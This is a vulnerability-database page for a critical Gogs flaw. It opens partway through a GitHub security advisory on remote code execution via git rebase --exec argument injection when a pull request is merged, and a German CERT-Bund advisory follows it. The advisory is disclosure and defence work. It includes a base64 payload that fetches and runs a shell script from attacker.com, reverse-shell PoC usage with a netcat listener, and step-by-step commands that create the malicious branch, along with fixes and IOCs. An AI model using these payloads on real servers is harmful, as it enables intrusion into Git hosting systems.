Git\u0027s argument parser treats `--exec=touch${IFS}/tmp/rce_proof` as the `--exec` flag\n2. The `--exec` flag specifies a command to run via `sh -c` after each replayed commit\n3. `${IFS}` expands to a space in the shell, bypassing git\u0027s prohibition on spaces in branch names\n4. The command `touch /tmp/rce_proof` executes as the Gogs server process user\n\nFor commands containing characters forbidden in git refs (`:`, `~`, `^`, `?`, `*`, `[`, `\\`, `//`), such as URLs, the attacker base64-encodes the payload:\n\n```bash\n--exec=echo${IFS}\u003cbase64\u003e|base64${IFS}-d|sh\n```\n\nFor example, `curl https://attacker.com/shell.sh|sh` becomes:\n\n```bash\n--exec=echo${IFS}Y3VybCBodHRwczovL2F0dGFja2VyLmNvbS9zaGVsbC5zaHxzaA==|base64${IFS}-d|sh\n```\n\nThis was validated end-to-end: a `wget` command with a URL executed inside the Docker container and wrote the fetched HTML to disk.\n\n### Full Execution Flow in `Merge()`\n\nThe `MergeStyleRebase` code path in `Merge()` executes these git commands sequentially:\n\n| Step                                                                               | Command                                                   | Result with malicious branch                                                 |\n| ---------------------------------------------------------------------------------- | --------------------------------------------------------- | ---------------------------------------------------------------------------- |\n| [1](https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L233)      | `git clone -b \u0027\u003cmalicious\u003e\u0027 \u003crepo\u003e \u003ctmp\u003e`                 | **Succeeds** - `-b` consumes `--exec=...` as the branch value                |\n| [2](https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L238-L248) | `git remote add head_repo \u003crepo\u003e` + `git fetch head_repo` | Succeeds normally                                                            |\n| [3](https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L282)      | `git rebase --quiet \u0027\u003cmalicious\u003e\u0027 \u0027head_repo/feature\u0027`    | **RCE fires here** - `--exec=\u003ccmd\u003e` parsed as flag, command runs via `sh -c` |\n| [4](https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L290)      | `git checkout -b \u003ctmpBranch\u003e`                             | Succeeds (tmpBranch is a server-generated timestamp)                         |\n| [5](https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L297)      | `git checkout \u0027\u003cmalicious\u003e\u0027`                              | **Fails** - git interprets `--exec=...` as invalid option for checkout       |\n\nStep 5 failure causes `Merge()` to return an error (HTTP 500), but **the RCE has already executed at Step 3**. The 500 error is logged but does not prevent exploitation. Defenders can look for this IOC in server logs:\n\n```log\n[E] ...merge: git checkout \u0027--exec=\u003c...\u003e\u0027: exit status 128 - error: unknown option `exec=\u003c...\u003e\u0027\n```\n\nThis is logged via [`c.Error(err, \"merge\")`](https://github.com/gogs/gogs/blob/v0.14.2/internal/route/repo/pull.go#L419) at ERROR level.\n\n### Why the PR Becomes Mergeable\n\nThe `testPatch()` function (called during PR creation at line 468) calls `UpdateLocalCopyBranch(pr.BaseBranch)` (`internal/database/repo.go:658`), which has two code paths:\n\n- **No local copy exists** (first call for a repo): Calls `git.Clone()` (line 664), which includes `--end-of-options` \u2192 the malicious branch name is treated as data, clone succeeds, and `testPatch` completes normally.\n- **Local copy already exists** (subsequent calls): Calls `gitRepo.Checkout(branch)` (line 684), which is missing `--end-of-options` \u2192 git interprets `--exec=...` as a flag \u2192 checkout fails \u2192 `testPatch` returns an error.\n\nThe exploit relies on the following causal chain:\n\n1. During PR creation (`NewPullRequest`, line 468), `testPatch()` is called. For a **fresh repository** with no local copy, the Clone path succeeds.\n2. Because `testPatch` didn\u0027t set the status to `PullRequestStatusConflict`, the status remains `PullRequestStatusChecking`, and the code at line 472-473 promotes it to `PullRequestStatusMergeable`.\n3. The background `TestPullRequests` goroutine (line 840) periodically re-checks PRs. When it calls `testPatch` again, the local copy now exists, so `UpdateLocalCopyBranch` takes the Checkout path \u2192 fails \u2192 returns an error.\n4. This error causes `TestPullRequests` to skip adding the PR to the update list (`return nil` at line 855) or skip `checkAndUpdateStatus()` (`continue` at line 877). Because `checkAndUpdateStatus` is never called, **the PR status remains at Mergeable indefinitely**.\n\nThe PoC handles this by creating a **fresh repository** (no local copy exists yet), ensuring the first `testPatch` succeeds via the Clone path.\n\n### Proof of Concept\n\nA standalone Python exploit (`gogs-rebase-rce.py`) is attached to this advisory. It automates the full exploit chain (authentication, repo creation, rebase enablement, payload delivery, PR creation, merge trigger, and cleanup) and supports both Linux and Windows targets. Requires Python 3.8+, `requests`, and a local `git` installation.\n\n#### Usage\n\n```bash\n# Reverse shell (Linux)\npython3 gogs-rebase-rce.py -t http://gogs:3000 -u attacker -p Password123 -l \u003cLHOST\u003e -x \u003cLPORT\u003e\n\n# Reverse shell (Windows)\npython3 gogs-rebase-rce.py -t http://gogs:3000 -u attacker -p Password123 -l \u003cLHOST\u003e -x \u003cLPORT\u003e --os windows\n\n# Custom command\npython3 gogs-rebase-rce.py -t http://gogs:3000 -u attacker -p Password123 -c \u0027id \u003e /tmp/pwned\u0027\n\n# Version fingerprint only (no exploit)\npython3 gogs-rebase-rce.py -t http://gogs:3000 -u attacker -p Password123 --check\n```\n\n#### Demo\n\nRun the PoC with a reverse shell payload:\n\n```bash\npython3 gogs-rebase-rce.py -t http://localhost:3080 -u attacker -p Password123 -l 172.17.0.1 -x 1337\n\n[*] Fingerprinting target...\n[+] Gogs 0.14.2 detected\n[*] Authenticating as \"attacker\"\n[+] Authenticated\n[*] Creating repository\n[+] Repository xxxx-yyyy created\n[*] Enabling rebase merge\n[+] Rebase merge enabled\n[*] Pushing branches via git\n[+] Branches pushed\n[*] Creating pull request\n[+] PR #1 created\n[*] Triggering rebase merge - RCE fires now!\n[+] Rebase merge triggered\n```\n\nChecking the listener:\n\n```bash\n$ nc -nlvp 1337\nListening on 0.0.0.0 1337\nConnection received on 172.17.0.2 43240\n$ whoami\ngit\n```\n\n### Manual Browser Reproduction\n\nThis can be reproduced entirely through the Gogs web UI:\n\n**Prerequisites**: A running Gogs instance (e.g., `http://localhost:3080`) with a registered user account.\n\n**Step 1: Create a repository and push branches**\n\n```bash\n# Create repo via Gogs API\ncurl -s -u attacker:Password123 -X POST http://localhost:3080/api/v1/user/repos \\\n  -H \u0027Content-Type: application/json\u0027 -d \u0027{\"name\":\"demo\"}\u0027\n\n# Set up local repo with divergent branches\nmkdir /tmp/demo \u0026\u0026 cd /tmp/demo \u0026\u0026 git init\ngit config user.email \"attacker@test.com\" \u0026\u0026 git config user.name \"attacker\"\necho \"# Demo\" \u003e README.md \u0026\u0026 git add . \u0026\u0026 git commit -m \"Initial commit\"\ngit checkout -b feature\necho \"feature\" \u003e feature.txt \u0026\u0026 git add . \u0026\u0026 git commit -m \"Add feature\"\ngit checkout master\necho \"update\" \u003e\u003e README.md \u0026\u0026 git add . \u0026\u0026 git commit -m \"Update master\"\n\n# Create the malicious branch (same commit as master)\ngit update-ref \u0027refs/heads/--exec=touch${IFS}/tmp/BROWSER_RCE_PROOF\u0027 HEAD\n\n# Push all branches\ngit remote add origin http://attacker:Password123@localhost:3080/attacker/demo.git\ngit push origin master feature \u0027refs/heads/--exec=touch${IFS}/tmp/BROWSER_RCE_PROOF:refs/heads/--exec=touch${IFS}/tmp/BROWSER_RCE_PROOF\u0027\n```\n\n**Step 2: Enable rebase in repo settings**\n\n1. Navigate to `http://localhost:3080/attacker/demo/settings`\n2. Click **Advanced Settings**\n3. Check **Enable Pull Requests**, then check **Allow rebase**\n4. Click **Save**\n\n(Or update the database directly: `UPDATE repository SET enable_pulls=1, pulls_allow_rebase=1 WHERE lower_name=\u0027demo\u0027;`)\n\n**Step 3: Create the Pull Request**\n\nNavigate to the compare URL (base = malicious branch, head = feature):\n\n```\nhttp://localhost:3080/attacker/demo/compare/%2D%2Dexec%3Dtouch%24%7BIFS%7D%2Ftmp%2FBROWSER_RCE_PROOF...feature\n```\n\nEnter a title (e.g., \"RCE PoC\") and click **New Pull Request**.\n\n**Step 4: Wait for testPatch (~5 seconds)**\n\nThe background `TestPullRequests` goroutine must set the PR to Mergeable. Wait a few seconds, then refresh the PR page. The merge button should appear.\n\n**Step 5: Trigger the merge**\n\n1. On the PR page (`/attacker/demo/pulls/1`), select **Rebase before merging**\n2. Click **Merge Pull Request**\n3. The server returns HTTP 500 (expected - `git checkout` of the malicious branch name fails after rebase)\n\n**Step 6: Verify RCE**\n\n```bash\n$ ls -la /tmp/BROWSER_RCE_PROOF\n-rw-rw-r-- 1 cryptocat cryptocat 0 Mar 16 18:02 /tmp/BROWSER_RCE_PROOF\n```\n\nThe file was created by the Gogs server process during `git rebase --exec`\n\n## Recommended Fix\n\n### Primary fix: Add `--` separator\n\n```go\n// internal/database/pull.go line 282\n\"git\", \"rebase\", \"--quiet\", \"--\", pr.BaseBranch, remoteHeadBranch\n```\n\n### Defense-in-depth: Validate branch names\n\nReject base branch names starting with `-` at the PR creation endpoint:\n\n```go\n// internal/route/repo/pull.go, after line 447\nif strings.HasPrefix(baseRef, \"-\") {\n    c.NotFound()\n    return nil, nil, nil, nil, \"\", \"\"\n}\n```\n\n### Additional hardening\n\nApply `--` separators to all other `process.ExecDir` calls in `Merge()` that use `pr.BaseBranch`:\n\n- Line 233: `git clone -b pr.BaseBranch` (not directly exploitable but should be hardened)\n- Line 297: `git checkout pr.BaseBranch` (currently fails, but should use `-- pr.BaseBranch`)\n- Line 315: `git push \u003crepo\u003e pr.BaseBranch` (should use `--` separator)\n\n## Relationship to Prior Argument Injection Fixes\n\nThis vulnerability is an **incomplete fix bypass** of the Category A argument injection invariant that Gogs has been patching across multiple advisories:\n\n| Advisory                                                                                    | CVE                                                               | Description                                  | Fix Applied                                                    |\n| ------------------------------------------------------------------------------------------- | ----------------------------------------------------------------- | -------------------------------------------- | -------------------------------------------------------------- |\n| [GHSA-m27m-h5gj-wwmg](https://github.com/gogs/gogs/security/advisories/GHSA-m27m-h5gj-wwmg) | [CVE-2024-39933](https://nvd.nist.gov/vuln/detail/CVE-2024-39933) | Argument injection when tagging new releases | Added `--` separator to `git tag`                              |\n| [GHSA-9pp6-wq8c-3w2c](https://github.com/gogs/gogs/security/advisories/GHSA-9pp6-wq8c-3w2c) | [CVE-2024-39932](https://nvd.nist.gov/vuln/detail/CVE-2024-39932) | Argument injection during changes preview    | Added `--end-of-options` to `git diff`                         |\n| [GHSA-v9vm-r24h-6rqm](https://github.com/gogs/gogs/security/advisories/GHSA-v9vm-r24h-6rqm) | [CVE-2026-26194](https://nvd.nist.gov/vuln/detail/CVE-2026-26194) | Release tag option injection in deletion     | Migrated to safe git-module API                                |\n| [GHSA-vm62-9jw3-c8w3](https://github.com/gogs/gogs/security/advisories/GHSA-vm62-9jw3-c8w3) | [CVE-2024-39930](https://nvd.nist.gov/vuln/detail/CVE-2024-39930) | Argument injection in built-in SSH server    | Added `--` separator to `git upload-pack` / `git receive-pack` |\n\nThe [`git-module` library](https://github.com/gogs/git-module) (`v1.8.7`) was hardened with `--end-of-options` in `Clone()`, `Push()`, `Fetch()`, and 28 other call sites. However, the `Merge()` function in `internal/database/pull.go` **bypasses all of these protections** because it uses raw `process.ExecDir` (which wraps `exec.Command` directly) instead of the safe git-module API. The [`git rebase` call](https://github.com/gogs/gogs/blob/v0.14.2/internal/database/pull.go#L282) was never migrated.\n\nNotably, `git-module.Checkout()` is also missing `--end-of-options` \u2014 a separate gap that incidentally causes the `testPatch` race condition this exploit leverages (see \"Why the PR Becomes Mergeable\" above).\n\n## Affected Platforms\n\nThe vulnerability has been confirmed on:\n\n- **Linux**: Docker (official image) and binary installation on Ubuntu 24.04\n- **Windows**: Binary installation with Git for Windows (MSYS2)\n\nOn Windows, the base64 inline payload approach fails because NTFS forbids the `|` character in filenames (git stores refs as files). The exploit uses file-based payload delivery instead: the payload is committed as a script file, and the branch name becomes `--exec=sh${IFS}\u003cfilename\u003e`. An `sh` wrapper invokes `cmd.exe //c \u003cpayload\u003e.bat` to avoid MSYS2 shell metacharacter mangling. The attached PoC handles this automatically.\n\n## Test Environment\n\n- **OS**: Ubuntu Linux 24.04, Windows (Git for Windows)\n- **Gogs version**: 0.14.2 (also confirmed on 0.15.0+dev, commit `b53d3162`)\n- **Go version**: go1.26.1\n- **Database**: SQLite\n- **Deployment**: Docker (official image), binary, and built from source\n\n## Credit\n\nJonah Burgess (CryptoCat) - Senior Security Researcher @Rapid7",
  "id": "GHSA-qf6p-p7ww-cwr9",
  "modified": "2026-06-23T17:02:40Z",
  "published": "2026-06-23T17:02:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/security/advisories/GHSA-qf6p-p7ww-cwr9"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/pull/8301"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/commit/a9dbafbfd8e1020bacc626420238c01d75d03364"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gogs/gogs"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gogs/gogs/releases/tag/v0.14.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gogs vulnerable to RCE via git rebase --exec argument injection in pull request merge"
}

WID-SEC-W-2026-1739

Vulnerability from csaf_certbund - Published: 2026-05-28 22:00 - Updated: 2026-06-08 22:00

Summary

Gogs: Schwachstelle ermöglicht Codeausführung

Severity

Kritisch

Notes

Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.

Produktbeschreibung: Gogs ist ein einfacher Git-Server.

Angriff: Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in Gogs ausnutzen, um beliebigen Programmcode auszuführen.

Betroffene Betriebssysteme: - Linux

CVE-2026-52806

Affected products

Known affected 1 product

Product	Identifier	Version	Remediation
Open Source Gogs <0.14.3 Open Source / Gogs		<0.14.3

Last affected 2 products

Product	Identifier	Version	Remediation
Open Source Gogs <=0.15.0+dev Open Source / Gogs		<=0.15.0+dev
Open Source Gogs <=0.14.2 Open Source / Gogs		<=0.14.2

References

4 references

URL	Category
https://wid.cert-bund.de/.well-known/csaf/white/2…	self
https://wid.cert-bund.de/portal/wid/securityadvis…	self
https://www.rapid7.com/blog/post/ve-authenticated…	external
https://github.com/rapid7/metasploit-framework/pu…	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "text": "kritisch"
    },
    "category": "csaf_base",
    "csaf_version": "2.0",
    "distribution": {
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "de-DE",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
      },
      {
        "category": "description",
        "text": "Gogs ist ein einfacher Git-Server.",
        "title": "Produktbeschreibung"
      },
      {
        "category": "summary",
        "text": "Ein entfernter, authentisierter Angreifer kann eine Schwachstelle in Gogs ausnutzen, um beliebigen Programmcode auszuf\u00fchren.",
        "title": "Angriff"
      },
      {
        "category": "general",
        "text": "- Linux",
        "title": "Betroffene Betriebssysteme"
      }
    ],
    "publisher": {
      "category": "other",
      "contact_details": "csaf-provider@cert-bund.de",
      "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
      "namespace": "https://www.bsi.bund.de"
    },
    "references": [
      {
        "category": "self",
        "summary": "WID-SEC-W-2026-1739 - CSAF Version",
        "url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-1739.json"
      },
      {
        "category": "self",
        "summary": "WID-SEC-2026-1739 - Portal Version",
        "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1739"
      },
      {
        "category": "external",
        "summary": "Rapid7 Blog vom 2026-05-28",
        "url": "https://www.rapid7.com/blog/post/ve-authenticated-rce-via-argument-injection-gogs-unfixed/"
      },
      {
        "category": "external",
        "summary": "Metasploit Module vom 2026-05-28",
        "url": "https://github.com/rapid7/metasploit-framework/pull/21515"
      }
    ],
    "source_lang": "en-US",
    "title": "Gogs: Schwachstelle erm\u00f6glicht Codeausf\u00fchrung",
    "tracking": {
      "current_release_date": "2026-06-08T22:00:00.000+00:00",
      "generator": {
        "date": "2026-06-09T11:25:54.345+00:00",
        "engine": {
          "name": "BSI-WID",
          "version": "1.6.0"
        }
      },
      "id": "WID-SEC-W-2026-1739",
      "initial_release_date": "2026-05-28T22:00:00.000+00:00",
      "revision_history": [
        {
          "date": "2026-05-28T22:00:00.000+00:00",
          "number": "1",
          "summary": "Initiale Fassung"
        },
        {
          "date": "2026-06-08T22:00:00.000+00:00",
          "number": "2",
          "summary": "Patch"
        }
      ],
      "status": "final",
      "version": "2"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c=0.14.2",
                "product": {
                  "name": "Open Source Gogs \u003c=0.14.2",
                  "product_id": "T051468"
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c=0.14.2",
                "product": {
                  "name": "Open Source Gogs \u003c=0.14.2",
                  "product_id": "T051468-fixed"
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c=0.15.0+dev",
                "product": {
                  "name": "Open Source Gogs \u003c=0.15.0+dev",
                  "product_id": "T054880"
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c=0.15.0+dev",
                "product": {
                  "name": "Open Source Gogs \u003c=0.15.0+dev",
                  "product_id": "T054880-fixed"
                }
              },
              {
                "category": "product_version_range",
                "name": "\u003c0.14.3",
                "product": {
                  "name": "Open Source Gogs \u003c0.14.3",
                  "product_id": "T055081"
                }
              },
              {
                "category": "product_version",
                "name": "0.14.3",
                "product": {
                  "name": "Open Source Gogs 0.14.3",
                  "product_id": "T055081-fixed",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:gogs:gogs:0.14.3"
                  }
                }
              }
            ],
            "category": "product_name",
            "name": "Gogs"
          }
        ],
        "category": "vendor",
        "name": "Open Source"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-52806",
      "product_status": {
        "known_affected": [
          "T055081"
        ],
        "last_affected": [
          "T054880",
          "T051468"
        ]
      },
      "release_date": "2026-05-28T22:00:00.000+00:00",
      "title": "CVE-2026-52806"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-52806 (GCVE-0-2026-52806)

FKIE_CVE-2026-52806

GHSA-QF6P-P7WW-CWR9

Gogs: RCE via git rebase --exec Argument Injection in PR Merge

Summary

Severity

Affected Versions

Impact

Prerequisites

Root Cause Analysis

Exploitation

Full Execution Flow in Merge()

Why the PR Becomes Mergeable

Proof of Concept

Usage

Demo

Manual Browser Reproduction

Recommended Fix

Primary fix: Add -- separator

Defense-in-depth: Validate branch names

Additional hardening

Relationship to Prior Argument Injection Fixes

Affected Platforms

Test Environment

Credit

WID-SEC-W-2026-1739

Tags

Sightings

Nomenclature

Gogs: RCE via `git rebase --exec` Argument Injection in PR Merge

Full Execution Flow in `Merge()`

Primary fix: Add `--` separator